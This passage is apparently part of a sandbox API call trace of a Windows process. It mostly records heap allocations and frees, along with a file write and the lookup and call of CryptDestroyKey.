lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f309a8 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0186.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2c678 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39008 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0186.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28348 | out: hHeap=0x970000) returned 1 [0186.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0186.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0186.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f41668 [0186.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d338 | out: hHeap=0x970000) returned 1 [0186.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0186.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0186.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f45998 [0186.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.152] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f45998*, nNumberOfBytesToWrite=0x4328, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f45998*, lpNumberOfBytesWritten=0x8cf5e4*=0x4328, lpOverlapped=0x0) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f45998 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0186.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0186.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.194] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0186.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0186.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0186.195] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0186.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0186.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0186.196] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e509b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0186.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.232] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0186.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.232] CryptDestroyKey (hKey=0xa87310) returned 1 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0186.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: 